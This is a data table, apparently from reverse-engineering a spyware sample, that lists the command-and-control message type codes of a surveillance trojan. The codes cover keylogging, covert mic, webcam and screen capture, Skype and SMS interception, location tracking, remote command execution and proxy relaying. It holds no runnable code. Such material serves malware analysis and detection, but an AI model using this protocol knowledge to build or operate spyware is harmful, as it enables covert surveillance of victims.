78,fs,160896,,TlvTypeFSFileExtension,
78,fs,161088,,TlvTypeFSDiskDriveType,Lorg/xmlpush/v3/o/e
78,fs,161408,,TlvTypeFSFileSize,"Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e"
78,fs,161584,,TlvTypeFSIsFolder,"Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e"
79,fs,161840,,TlvTypeFSReadOnly,"Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e"
79,fs,162096,,TlvTypeFSHidden,"Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e"
79,fs,162352,,TlvTypeFSSystem,"Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e"
79,fs,162688,,TlvTypeFSFileCreationTime,"Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e"
79,fs,162944,,TlvTypeFSFileLastAccessTime,"Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e"
79,fs,163200,,TlvTypeFSFileLastWriteTime,"Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e"
79,fs,163472,,TlvTypeFSFullPathM,"Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/o/d, L/org/xmlpush/v3/h/c"
79,fs,163632,×,unknown,Lorg/xmlpush/v3/o/e
82,system config file,168096,,TlvTypeGetFileSystemConfigRequest,
82,system config file,168352,,TlvTypeFileSystemConfigReply,
82,system config file,168608,,TlvTypeSetFileSystemConfigRequest,
128,line cmd,262560,,TlvTypeStartCmdLineSessionRequest,
128,line cmd,262816,,TlvTypeStartCmdLineSessionReply,
128,line cmd,263072,,TlvTypeStopCmdLineSessionRequest,
128,line cmd,263328,,TlvTypeCmdLineSessionStoppedReply,
128,line cmd,263584,,TlvTypeCmdLineExecute,
128,line cmd,263840,,TlvTypeCmdLineExecutionResult,
130,line cmd execute,266352,,TlvTypeCmdLineExecuteCommand,
130,line cmd execute,266560,,TlvTypeCmdLineExecuteAnswerID,
130,line cmd execute,266864,,TlvTypeCmdLineExecuteAnswerData,
146,line config cmd,299168,,TlvTypeGetCmdLineConfigRequest,
146,line config cmd,299424,,TlvTypeCmdLineConfigReply,
146,line config cmd,299680,,TlvTypeSetCmdLineConfigRequest,
160,config scheduler,328096,,TlvTypeGetSchedulerConfigRequest,
160,config scheduler,328352,,TlvTypeSchedulerConfigReply,
160,config scheduler,328608,,TlvTypeSetSchedulerConfigRequest,
162,task scheduler,331920,,TlvTypeSchedulerTask,
162,task scheduler,332192,,TlvTypeSchedulerTaskRecordByTime,
162,task scheduler,332448,,TlvTypeSchedulerTaskRecordScreenWhenAppRuns,
162,task scheduler,332704,,TlvTypeSchedulerTaskRecordMicWhenAppUsesIt,
162,task scheduler,332960,,TlvTypeSchedulerTaskRecordWebCamWhenAppUsesIt,
176,sch,360592,,TlvTypeSCHTaskConfiguration,L/org/xmlpush/v3/h/c
176,sch,360752,,TlvTypeSCHTaskEnabled,L/org/xmlpush/v3/h/c
176,sch,361344,,TlvTypeSCHTaskStartDateTime,L/org/xmlpush/v3/h/c
176,sch,361600,,TlvTypeSCHTaskStopDateTime,L/org/xmlpush/v3/h/c
176,sch,362112,,TlvTypeSCHApplicationName,
176,sch,362288,,TlvTypeSCHApplicationWindowOnly,
512,microphone,1048992,,TlvTypeStartMicrophoneRequest,
512,microphone,1049248,,TlvTypeStartMicrophoneReply,
512,microphone,1049504,,TlvTypeMicrophoneFrame,
512,microphone,1049760,,TlvTypeStopMicrophoneRequest,
512,microphone,1050016,,TlvTypeMicrophoneStoppedReply,
512,microphone,1050272,,TlvTypeStartMicrophoneRecording,
514,,1052736,,TlvTypeMICFrameID,"Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/n"
514,,1053072,,TlvTypeMICFrameData,"Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/n"
514,,1053312,,TlvTypeAudioSessionType,
514,,1053568,,TlvTypeAudioEncodingType,
518,audio config,1061024,,TlvTypeGetAudioConfigRequest,
518,audio config,1061280,,TlvTypeAudioConfigReply,
518,audio config,1061536,,TlvTypeSetAudioConfigRequest,
520,type video,1066112,,TlvTypeVideoSessionType,"Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b"
520,type video,1066368,,TlvTypeVideoEncodingType,"Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b"
544,screen,1114528,,TlvTypeStartScreenRequest,
544,screen,1114784,,TlvTypeStartScreenReply,
544,screen,1115040,,TlvTypeScreenFrame,
544,screen,1115296,,TlvTypeStopScreenRequest,
544,screen,1115552,,TlvTypeScreenStoppedReply,
544,screen,1115808,,TlvTypeStartScreenRecording,
548,cam web,1122720,,TlvTypeStartWebCamRequest,
548,cam web,1122976,,TlvTypeStartWebCamReply,
548,cam web,1123232,,TlvTypeWebCamFrame,
548,cam web,1123488,,TlvTypeStopWebCamRequest,
548,cam web,1123744,,TlvTypeWebCamStoppedReply,
548,cam web,1124000,,TlvTypeStartWebCamRecording,
550,config video,1126560,,TlvTypeGetVideoConfigRequest,
550,config video,1126816,,TlvTypeVideoConfigReply,
550,config video,1127072,,TlvTypeSetVideoConfigRequest,
552,,1130560,,TlvTypeVDFrameID,"Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b"
552,,1130896,,TlvTypeVDFrameData,"Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b"
552,,1131136,,TlvTypeOriginalVideoResolution,"Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b"
552,,1131392,,TlvTypeVideoResolution,"Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b"
552,,1132160,,TlvTypeAutomaticRecordingUID,
576,key logging,1180064,,TlvTypeStartKeyLoggingRequest,
576,key logging,1180320,,TlvTypeStartKeyLoggingReply,
576,key logging,1180576,,TlvTypeKeyLoggingFrame,
576,key logging,1180832,,TlvTypeStopKeyLoggingRequest,
576,key logging,1181088,,TlvTypeKeyLoggingStoppedReply,
582,config keylogger,1192096,,TlvTypeGetKeyloggerConfigRequest,
582,config keylogger,1192352,,TlvTypeKeyloggerConfigReply,
582,config keylogger,1192608,,TlvTypeSetKeyloggerConfigRequest,
584,kl frame data,1196416,,TlvTypeKLFrameData,Lorg/xmlpush/v3/o/i
640,skype,1311136,,TlvTypeSkypeAudioMetaInfo,
640,skype,1311376,,TlvTypeSkypeAudioRecording,
640,skype,1311648,,TlvTypeSkypeTextRecording,
640,skype,1311904,,TlvTypeSkypeFileMetaInfo,
640,skype,1312144,,TlvTypeSkypeFileRecording,
640,skype,1312416,,TlvTypeSkypeContactsRecording,
640,skype,1312640,,TlvTypeSkypeContactsUserData,
646,config skype,1323168,,TlvTypeGetSkypeConfigRequest,
646,config skype,1323424,,TlvTypeSkypeConfigReply,
646,config skype,1323680,,TlvTypeSetSkypeConfigRequest,
646,config skype,1324336,,TlvTypeConfigSkypeAudioEnable,
646,config skype,1324592,,TlvTypeConfigSkypeTextEnable,
646,config skype,1324848,,TlvTypeConfigSkypeFileEnable,
647,config contacts enable list skype,1325104,,TlvTypeConfigSkypeContactsListEnable,
648,skype,1327232,,TlvTypeSkypeAudioEncodingType,
648,skype,1327488,,TlvTypeSkypeLoggedInUserAccountName,
648,skype,1327744,,TlvTypeSkypeConversationPartnerAccountName,
648,skype,1328000,,TlvTypeSkypeConversationPartnerDisplayName,
648,skype,1328256,,TlvTypeSkypeChatMembers,
648,skype,1328512,,TlvTypeSkypeTextMessage,
648,skype,1328768,,TlvTypeSkypeChatID,
648,skype,1329024,,TlvTypeSkypeSenderAccountName,
649,skype,1329280,,TlvTypeSkypeSenderDisplayName,
649,skype,1329536,,TlvTypeSkypeIncoming,
649,skype,1329792,,TlvTypeSkypeSessionType,
704,changed file,1442208,,TlvTypeChangedFileMetaInfo,
704,changed file,1442432,,TlvTypeChangedFileChangeTime,
704,changed file,1442688,,TlvTypeChangedFileChangeEvent,
704,changed file,1442960,,TlvTypeChangedFileRecording,
710,config changed,1454240,,TlvTypeGetChangedConfigRequest,
710,config changed,1454496,,TlvTypeChangedConfigReply,
710,config changed,1454752,,TlvTypeSetChangedConfigRequest,
710,config changed,1454912,,TlvTypeConfigChangedEvents,
736,,1507744,,TlvTypeAccessedFileMetaInfo,
736,,1507968,,TlvTypeAccessedFileAccessTime,
736,,1508224,,TlvTypeAccessedFileAccessEvent,
736,,1508496,,TlvTypeAccessedFileRecording,
736,,1508736,,TlvTypeAccessedApplicationName,
736,,1508912,,TlvTypeConfigRecordImagesFromExplorer,
742,accessed config,1519776,,TlvTypeGetAccessedConfigRequest,
742,accessed config,1520032,,TlvTypeAccessedConfigReply,
742,accessed config,1520288,,TlvTypeSetAccessedConfigRequest,
742,accessed config,1520448,,TlvTypeConfigAccessedEvents,
768,print,1573280,,TlvTypePrintFileMetaInfo,
768,print,1573520,,TlvTypePrintFrame,
772,print,1581184,,TlvTypePrintApplicationName,
772,print,1581440,,TlvTypePrintFilename,
772,print,1581696,,TlvTypePrintEncodingType,
774,print config,1585312,,TlvTypeGetPrintConfigRequest,
774,print config,1585568,,TlvTypePrintConfigReply,
774,print config,1585824,,TlvTypeSetPrintConfigRequest,
800,deleted,1638816,,TlvTypeDeletedFileMetaInfo,
800,deleted,1639296,,TlvTypeDeletedFileDeletionTime,
800,deleted,1639552,,TlvTypeDeletedFileRecycleBin,
800,deleted,1639808,,TlvTypeDeletedMethod,
800,deleted,1640064,,TlvTypeDeletedApplicationName,
800,deleted,1640336,,TlvTypeDeletedFileRecording,
806,config deleted,1650848,,TlvTypeGetDeletedConfigRequest,
806,config deleted,1651104,,TlvTypeDeletedConfigReply,
806,config deleted,1651360,,TlvTypeSetDeletedConfigRequest,
1024,application upload forensics,2097568,,TlvTypeUploadForensicsApplicationRequest,
1024,application upload forensics,2097824,,TlvTypeUploadForensicsApplicationReply,
1024,application upload forensics,2098080,,TlvTypeUploadForensicsApplicationChunk,
1024,application upload forensics,2098336,,TlvTypeUploadForensicsApplicationDoneRequest,
1024,application upload forensics,2098592,,TlvTypeUploadForensicsApplicationDoneReply,
1026,application remove forensics,2101664,,TlvTypeRemoveForensicsApplicationRequest,
1026,application remove forensics,2101920,,TlvTypeRemoveForensicsApplicationReply,
1028,app forensics execute,2105760,,TlvTypeForensicsAppExecuteRequest,
1028,app forensics execute,2106016,,TlvTypeForensicsAppExecuteReply,
1028,app forensics execute,2106272,,TlvTypeForensicsAppExecuteResult,
1028,app forensics execute,2106528,,TlvTypeForensicsAppExecuteResultChunk,
1028,app forensics execute,2106784,,TlvTypeForensicsAppExecuteResultDone,
1028,app forensics execute,2107040,,TlvTypeForensicsCancelAppExecuteRequest,
1028,app forensics execute,2107296,,TlvTypeForensicsCancelAppExecuteReply,
1030,config forensics,2109600,,TlvTypeGetForensicsConfigRequest,
1030,config forensics,2109856,,TlvTypeForensicsConfigReply,
1030,config forensics,2110112,,TlvTypeSetForensicsConfigRequest,
1032,application config info forensics,2113680,,TlvTypeConfigForensicsApplicationInfoGeneric,
1032,application config info forensics,2113952,,TlvTypeConfigForensicsApplicationInfo,
1034,forensics,2117760,,TlvTypeConfigForensicsApplicationName,
1034,forensics,2117952,,TlvTypeConfigForensicsApplicationSize,
1034,forensics,2118208,,TlvTypeConfigForensicsApplicationID,
1034,forensics,2118528,,TlvTypeConfigForensicsApplicationCmdline,
1034,forensics,2118784,,TlvTypeConfigForensicsApplicationOutput,
1034,forensics,2118976,,TlvTypeConfigForensicsApplicationTimeout,
1034,forensics,2119232,,TlvTypeConfigForensicsApplicationVersion,
1034,forensics,2119552,,TlvTypeForensicsFriendlyName,
1035,output application config forensics,2119808,,TlvTypeConfigForensicsApplicationOutputPrepend,
1035,output application config forensics,2120064,,TlvTypeConfigForensicsApplicationOutputContentType,
1056,vo meta info ip,2163104,,TlvTypeVoIPMetaInfo,
1058,vo ip,2166912,,TlvTypeVoIPEncodingType,
1058,vo ip,2167168,,TlvTypeVoIPSessionType,
1058,vo ip,2167424,,TlvTypeVoIPApplicationName,Lorg/xmlpush/v3/o/n
1058,vo ip,2167696,,TlvTypeVoIPAppScreenshot,
1058,vo ip,2167952,,TlvTypeVoIPAudioRecording,
1058,vo ip,2168112,,TlvTypeConfigVoIPScreenshotEnabled,
1062,vo config ip,2175136,,TlvTypeGetVoIPConfigRequest,
1062,vo config ip,2175392,,TlvTypeVoIPConfigReply,
1062,vo config ip,2175648,,TlvTypeSetVoIPConfigRequest,
1088,clicks mouse,2228640,,TlvTypeMouseClicksMetaInfo,
1088,clicks mouse,2228896,,TlvTypeMouseClicksFrame,
1090,clicks mouse,2232448,,TlvTypeMouseClicksEncodingType,
1090,clicks mouse,2232896,,TlvTypeConfigMouseClicksRectangle,
1090,clicks mouse,2233152,,TlvTypeConfigMouseClicksSensitivity,
1090,clicks mouse,2233408,,TlvTypeConfigMouseClicksType,
1094,clicks config mouse,2240672,,TlvTypeGetMouseClicksConfigRequest,
1094,clicks config mouse,2240928,,TlvTypeMouseClicksConfigReply,
1094,clicks config mouse,2241184,,TlvTypeSetMouseClicksConfigRequest,
2112,sms,4325792,,TlvTypeMobileSMSMetaInfo,Lorg/xmlpush/v3/f/b
2112,sms,4326016,,TlvTypeMobileSMSData,Lorg/xmlpush/v3/f/b
2112,sms,4326256,,TlvTypeSMSSenderNumber,Lorg/xmlpush/v3/f/b
2112,sms,4326512,,TlvTypeSMSRecipientNumber,Lorg/xmlpush/v3/f/b
2112,sms,4326528,,TlvTypeSMSInformation,
2112,sms,4326768,,TlvTypeSMSDirection,Lorg/xmlpush/v3/f/b
2112,sms,4327040,×,unknown,Lorg/xmlpush/v3/f/b
2144,address book mobile,4391328,,TlvTypeMobileAddressBookMetaInfo,Lorg/xmlpush/v3/i/a
2144,address book mobile,4391552,,TlvTypeMobileAddressBookData,Lorg/xmlpush/v3/i/a
2152,address book checksum mobile,4407360,,TlvTypeMobileAddressBookChecksum,
2176,mobile blackberry,4456864,,TlvTypeMobileBlackberryMessengerMetaInfo,
2176,mobile blackberry,4457088,,TlvTypeMobileBlackberryMessengerData,
2176,mobile blackberry,4457328,,TlvTypeMobileBlackberryMsChatID,
2176,mobile blackberry,4457600,,TlvTypeMobileBlackberryMsConversationPartners,
2208,mobile tracking,4522400,,TlvTypeMobileTrackingStartRequest,
2208,mobile tracking,4522656,,TlvTypeMobileTrackingStopRequest,
2208,mobile tracking,4523376,,TlvTypeMobileTrackingDataV10,"Lorg/xmlpush/v3/t/e, Lorg/xmlpush/v3/t/e, Lorg/xmlpush/v3/t/e, Lorg/xmlpush/v3/t/e"
2214,mobile config tracking,4535200,,TlvTypeMobileTrackingConfig,Lorg/xmlpush/v3/h/c
2214,mobile config tracking,4535440,,TlvTypeMobileTrackingConfigRaw,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
2216,mobile tracking,4538432,,TlvTypeMobileTrackingTimeInterval,L/org/xmlpush/v3/h/c
2216,mobile tracking,4538688,,TlvTypeMobileTrackingDistance,L/org/xmlpush/v3/h/c
2216,mobile tracking,4538928,,TlvTypeMobileTrackingSendOnAnyChannel,L/org/xmlpush/v3/h/c
2240,mobile call phone,4587936,,TlvTypeMobilePhoneCallLogsMetaInfo,Lorg/xmlpush/v3/f/a
2240,mobile call phone,4588192,,TlvTypeMobilePhoneCallLogsData,Lorg/xmlpush/v3/f/b
2240,mobile call phone,4588400,,TlvTypeMobilePhoneCallLogsType,Lorg/xmlpush/v3/f/b
2240,mobile call phone,4588672,,TlvTypeMobilePhoneCallAdditionalInformation,Lorg/xmlpush/v3/f/b
2240,mobile call phone,4588912,,TlvTypeMobilePhoneCallLogsCallerNumber,Lorg/xmlpush/v3/f/b
2240,mobile call phone,4589168,,TlvTypeMobilePhoneCallLogsCalleeNumber,Lorg/xmlpush/v3/f/b
2240,mobile call phone,4589440,,TlvTypeMobilePhoneCallLogsCallerName,Lorg/xmlpush/v3/f/b
2241,name call phone logs mobile callee,4589696,,TlvTypeMobilePhoneCallLogsCalleeName,Lorg/xmlpush/v3/f/b
2242,last call phone entry mobile endtime log,4591680,,TlvTypeMobilePhoneCallLogLastEntryEndtime,
3072,mobile logging,6291872,,TlvTypeMobileLoggingMetaInfo,
3072,mobile logging,6292096,,TlvTypeMobileLoggingData,
3616,master agent,7405984,,TlvTypeMasterAgentLogin,
3616,master agent,7406240,,TlvTypeMasterAgentLoginAnswer,
3616,master agent,7406752,,TlvTypeMasterAgentTargetList,
3616,master agent,7407008,,TlvTypeMasterAgentTargetOnlineList,
3616,master agent,7407264,,TlvTypeMasterAgentTargetInfoReply,
3616,master agent,7407520,,TlvTypeMasterAgentUserList,
3617,master agent list,7407776,,TlvTypeMasterAgentUserListReply,
3617,master agent list,7408032,,TlvTypeMasterAgentTargetArchivedList,
3617,master agent list,7408288,,TlvTypeMasterAgentTargetListEx,
3617,master agent list,7408544,,TlvTypeMasterAgentTargetOnlineListEx,
3617,master agent list,7408800,,TlvTypeMasterAgentMobileTargetArchivedList,
3617,master agent list,7409056,,TlvTypeMasterAgentMobileTargetList,
3617,master agent list,7409312,,TlvTypeMasterAgentMobileTargetOnlineList,
3618,,7409824,,TlvTypeMasterAgentQueryFirst,
3618,,7410080,,TlvTypeMasterAgentQueryNext,
3618,,7410336,,TlvTypeMasterAgentQueryLast,
3618,,7410592,,TlvTypeMasterAgentQueryAnswer,
3618,,7410848,,TlvTypeMasterAgentRemoveRecord,
3618,,7411104,,TlvTypeMasterAgentTargetInfoExReply,
3618,,7411344,,TlvTypeTargetInfoExProperty,
3618,,7411616,,TlvTypeTargetInfoExPropertyValue,
3619,,7411840,,TlvTypeTargetInfoExPropertyValueName,
3619,,7411968,,TlvTypeTargetInfoExPropertyValueData,
3619,,7412384,,TlvTypeMasterAgentAlarm,
3620,master agent,7413920,,TlvTypeMasterAgentRetrieveData,
3620,master agent,7414176,,TlvTypeMasterAgentRetrieveDataAnswer,
3620,master agent,7414432,,TlvTypeMasterAgentRemoveUser,
3620,master agent,7414688,,TlvTypeMasterAgentRemoveTarget,
3620,master agent,7414944,,TlvTypeMasterAgentRetrieveDataComments,
3620,master agent,7415200,,TlvTypeMasterAgentUpdateDataComments,
3620,master agent,7415712,,TlvTypeMasterAgentRetrieveActivityLogging,
3621,master agent,7415968,,TlvTypeMasterAgentRetrieveMasterLogging,
3621,master agent,7416224,,TlvTypeMasterAgentRetrieveAgentActivityLogging,
3621,master agent,7417248,,TlvTypeMasterAgentSendUserGUIConfig,
3621,master agent,7417504,,TlvTypeMasterAgentGetUserGUIConfigRequest,
3621,master agent,7417760,,TlvTypeMasterAgentGetUserGUIConfigReply,
3622,master agent,7418016,,TlvTypeMasterAgentProxyList,
3622,master agent,7418272,,TlvTypeMasterAgentProxyInfoReply,
3622,master agent,7419040,,TlvTypeMasterAgentNameValuePacket,
3622,master agent,7419248,,TlvTypeMasterAgentValueName,
3622,master agent,7419392,,TlvTypeMasterAgentValueData,
3622,master agent,7419808,,TlvTypeMasterAgentRetrieveTargetHistory,
3623,install master agent,7421088,,TlvTypeMasterAgentInstallMasterLicense,
3623,install master agent,7421344,,TlvTypeMasterAgentInstallSoftwareUpdate,
3623,install master agent,7421600,,TlvTypeMasterAgentInstallSoftwareUpdateChunk,
3623,install master agent,7421856,,TlvTypeMasterAgentInstallSoftwareUpdateDone,
3624,master agent,7422112,,TlvTypeMasterAgentSoftwareUpdateInfo,
3624,master agent,7422368,,TlvTypeMasterAgentSoftwareUpdateInfoReply,
3624,master agent,7422624,,TlvTypeMasterAgentSoftwareUpdate,
3624,master agent,7422880,,TlvTypeMasterAgentSoftwareUpdateReply,
3624,master agent,7423136,,TlvTypeMasterAgentSoftwareUpdateNext,
3624,master agent,7423392,,TlvTypeMasterAgentAddTimeSchedule,
3624,master agent,7423648,,TlvTypeMasterAgentAddScreenSchedule,
3624,master agent,7423904,,TlvTypeMasterAgentAddLockedSchedule,
3625,master agent,7424160,,TlvTypeMasterAgentRemoveSchedule,
3625,master agent,7424416,,TlvTypeMasterAgentGetSchedulerList,
3625,master agent,7424672,,TlvTypeMasterAgentSchedulerTimeAction,
3625,master agent,7424928,,TlvTypeMasterAgentSchedulerScreenAction,
3625,master agent,7425184,,TlvTypeMasterAgentSchedulerLockedAction,
3625,master agent,7425440,,TlvTypeMasterAgentProjectSoftwareUpdateInfo,
3625,master agent,7425696,,TlvTypeMasterAgentProjectSoftwareUpdateInfoReply,
3625,master agent,7425952,,TlvTypeMasterAgentProjectSoftwareUpdate,
3626,master agent,7426112,,TlvTypeMasterAgentSchedulerID,
3626,master agent,7426368,,TlvTypeMasterAgentSchedulerStartTime,L/org/xmlpush/v3/h/c
3626,master agent,7426624,,TlvTypeMasterAgentSchedulerStopTime,L/org/xmlpush/v3/h/c
3626,master agent,7427488,,TlvTypeMasterAgentAddRecordedDataAvailableSchedule,
3626,master agent,7427744,,TlvTypeMasterAgentSchedulerRecordedDataAvailableAction,
3627,master agent data,7428256,,TlvTypeMasterAgentRetrieveRemoteMasterData,
3627,master agent data,7428512,,TlvTypeMasterAgentRetrieveRemoteMasterDataReply,
3627,master agent data,7428768,,TlvTypeMasterAgentDeleteRemoteMasterData,
3627,master agent data,7429024,,TlvTypeMasterAgentRetrieveOfflineMasterData,
3627,master agent data,7429280,,TlvTypeMasterAgentRetrieveOfflineMasterDataReply,
3627,master agent data,7429536,,TlvTypeMasterAgentDeleteOfflineMasterData,
3628,master agent,7430304,,TlvTypeMasterAgentQueryFirstEx,
3628,master agent,7430560,,TlvTypeMasterAgentQueryNextEx,
3628,master agent,7430816,,TlvTypeMasterAgentQueryLastEx,
3628,master agent,7431072,,TlvTypeMasterAgentQueryAnswerEx,
3628,master agent,7431328,,TlvTypeMasterAgentSendUserPreferences,
3628,master agent,7431584,,TlvTypeMasterAgentGetUserPreferencesRequest,
3628,master agent,7431840,,TlvTypeMasterAgentGetUserPreferencesReply,
3628,master agent,7432096,,TlvTypeMasterAgentListMCFilesRequest,
3629,master agent mc,7432608,,TlvTypeMasterAgentDeleteMCFiles,
3629,master agent mc,7432864,,TlvTypeMasterAgentSendMCFiles,
3629,master agent mc,7433120,,TlvTypeMasterAgentMCStatisticsRequest,
3629,master agent mc,7433376,,TlvTypeMasterAgentMCStatisticsReply,
3629,master agent mc,7433616,,TlvTypeMasterAgentMCStatisticsValues,
3630,master agent,7434400,,TlvTypeMasterAgentTrojanKeyRequest,
3630,master agent,7434656,,TlvTypeMasterAgentTrojanKeyReply,
3630,master agent,7434912,,TlvTypeMasterAgentEvProtectionX509Request,
3630,master agent,7435168,,TlvTypeMasterAgentEvProtectionX509Reply,
3630,master agent,7435424,,TlvTypeMasterAgentEvProtectionImportCert,
3630,master agent,7435680,,TlvTypeMasterAgentEvProtectionImportCertCompleted,
3630,master agent,7435936,,TlvTypeMasterAgentConfigurationRequest,
3630,master agent,7436192,,TlvTypeMasterAgentConfigurationReply,
3631,master agent configuration,7436448,,TlvTypeMasterAgentConfigurationUpdateRequest,
3631,master agent configuration,7436704,,TlvTypeMasterAgentConfigurationUpdateRequestCompleted,
3631,master agent configuration,7436944,,TlvTypeMasterAgentConfiguration,
3631,master agent configuration,7437216,,TlvTypeMasterAgentConfigurationValue,
3631,master agent configuration,7437424,,TlvTypeMasterAgentConfigurationValueName,
3631,master agent configuration,7437568,,TlvTypeMasterAgentConfigurationValueData,
3631,master agent configuration,7437984,,TlvTypeMasterAgentConfigurationTransferDone,
3632,master agent,7438496,,TlvTypeMasterAgentRetrieveTargetFile,
3632,master agent,7438752,,TlvTypeMasterAgentRetrieveTargetFileAnswer,
3632,master agent,7438912,,TlvTypeMasterAgentAlarmEntryID,
3632,master agent,7439168,,TlvTypeMasterAgentAlarmEntryVersion,
3632,master agent,7439424,,TlvTypeMasterAgentAlarmTriggerFlags,
3632,master agent,7439776,,TlvTypeMasterAgentGetAlarmList,
3632,master agent,7440032,,TlvTypeMasterAgentAddAlarmEntry,
3632,master agent,7440288,,TlvTypeMasterAgentRemoveAlarmEntry,
3633,master agent,7440544,,TlvTypeMasterAgentAlarmEntry,
3633,master agent,7440800,,TlvTypeMasterAgentSystemStatus,
3633,master agent,7441056,,TlvTypeMasterAgentSystemStatusRequest,
3633,master agent,7441312,,TlvTypeMasterAgentSystemStatusReply,
3633,master agent,7441552,,TlvTypeMasterAgentLicenseValues,
3633,master agent,7441824,,TlvTypeMasterAgentLicenseValuesRequest,
3633,master agent,7442080,,TlvTypeMasterAgentLicenseValuesReply,
3634,master agent,7442592,,TlvTypeMasterAgentGetNetworkConfigurationRequest,
3634,master agent,7442848,,TlvTypeMasterAgentSetNetworkConfigurationRequest,
3634,master agent,7443104,,TlvTypeMasterAgentSetNetworkConfigurationReply,
3634,master agent,7443360,,TlvTypeMasterAgentRetrieveAllowedModulesList,
3634,master agent,7443616,,TlvTypeMasterAgentRetrieveAllowedModulesListAnswer,
3636,master agent,7446688,,TlvTypeMasterAgentRemoveAllTargetData,
3636,master agent,7446944,,TlvTypeMasterAgentForceDownloadRecordedData,
3636,master agent,7447200,,TlvTypeMasterAgentTargetCreateNotification,
3636,master agent,7447456,,TlvTypeMasterAgentMobileTargetInfoReply,
3636,master agent,7447696,,TlvTypeMasterAgentMobileTargetInfoValues,
3638,master agent alert,7450784,,TlvTypeMasterAgentAlert,
3640,master agent,7454880,,TlvTypeMasterAgentAddUser,
3640,master agent,7455392,,TlvTypeMasterAgentAddUserReply,
3640,master agent,7455648,,TlvTypeMasterAgentModifyUser,
3640,master agent,7455904,,TlvTypeMasterAgentSetUserPermission,
3640,master agent,7456160,,TlvTypeMasterAgentSetTargetPermission,
3640,master agent,7456400,,TlvTypeMasterAgentUserPermission,
3640,master agent,7456656,,TlvTypeMasterAgentTargetPermission,
3641,master agent,7456928,,TlvTypeMasterAgentUserPermissionValuePacket,
3641,master agent,7457184,,TlvTypeMasterAgentTargetPermissionValuePacket,
3641,master agent,7457344,,TlvTypeMasterAgentUserPermissionValueName,
3641,master agent,7457600,,TlvTypeMasterAgentTargetPermissionValueName,
3641,master agent,7457856,,TlvTypeMasterAgentUserPermissionValueData,
3641,master agent,7458112,,TlvTypeMasterAgentTargetPermissionValueData,
3641,master agent,7458464,,TlvTypeMasterAgentModifyPassword,
3641,master agent,7458656,,TlvTypeMasterAgentMobileTargetPermissionValueName,
3642,master agent,7458976,,TlvTypeMasterAgentUploadFile,
3642,master agent,7459232,,TlvTypeMasterAgentUploadFileChunk,
3642,master agent,7459488,,TlvTypeMasterAgentUploadFileDone,
3642,master agent,7459744,,TlvTypeMasterAgentUploadFilesTransferDone,
3642,master agent,7460000,,TlvTypeMasterAgentGetTargetModuleConfigRequest,
3642,master agent,7460256,,TlvTypeMasterAgentRemoveFile,
3642,master agent,7460512,,TlvTypeMasterAgentMobileProxyList,
3642,master agent,7460768,,TlvTypeMasterAgentSMSProxyList,
3643,master agent,7461024,,TlvTypeMasterAgentSMSProxyInfoReply,
3643,master agent,7461280,,TlvTypeMasterAgentCallPhoneNumberList,
3643,master agent,7461536,,TlvTypeMasterAgentCallPhoneNumberInfoReply,
3643,master agent,7461792,,TlvTypeMasterAgentGetMobileTargetModuleConfigRequest,
3643,master agent,7462048,,TlvTypeMasterAgentSendSMS,
3647,master agent,7469984,,TlvTypeMasterAgentEncryptionRequired,
3647,master agent,7470240,,TlvTypeMasterAgentFileCompleted,
3647,master agent,7470496,,TlvTypeMasterAgentRequestCompleted,
3647,master agent,7470752,,TlvTypeAgentMasterComm,
3647,master agent,7471008,,TlvTypeMasterAgentRequestStatus,
3648,master,7471424,,TlvTypeProxyMasterCommSig,
3648,master,7471520,,TlvTypeMasterTargetConn,
3648,master,7471776,,TlvTypeProxyMasterComm,
3648,master,7472032,,TlvTypeMasterProxyComm,
3648,master,7472288,,TlvTypeProxyMasterHeartBeatAnswer,
3648,master,7472544,,TlvTypeProxyMasterDisconnect,
3648,master,7472704,,TlvTypeProxyMasterNotification,
3648,master,7473056,,TlvTypeProxyMasterRequest,
3649,master,7473312,,TlvTypeMasterProxyCommNotification,
3649,master,7473568,,TlvTypeMasterCheckTargetDisconnect,
3680,target proxy,7536960,,TlvTypeProxyTargetCommSig,
3680,target proxy,7537312,,TlvTypeProxyTargetComm,
3680,target proxy,7537568,,TlvTypeProxyMasterTargetComm,
3680,target proxy,7537728,,TlvTypeProxyTargetRequestCrypto,
3680,target proxy,7538064,,TlvTypeProxyTargetAnswerCrypto,
3744,target,7668128,,TlvTypeMasterTargetComm,
3744,target,7668384,,TlvTypeTargetCloseAllLiveStreaming,
3776,relay,7733664,,TlvTypeRelayProxyComm,
3776,relay,7734176,,TlvTypeRelayDummyHeartbeat,
4032,test type meta,8257792,,TlvTypeTestMetaTypeInvalid,
4032,test type meta,8258608,,TlvTypeTestMetaTypeBool,
4032,test type meta,8258880,,TlvTypeTestMetaTypeUInt,
4032,test type meta,8259152,,TlvTypeTestMetaTypeInt,
4032,test type meta,8259440,,TlvTypeTestMetaTypeString,
4033,test,8259712,,TlvTypeTestMetaTypeUnicode,
4033,test,8259984,,TlvTypeTestMetaTypeRaw,
4033,test,8260256,,TlvTypeTestMetaTypeGroup,
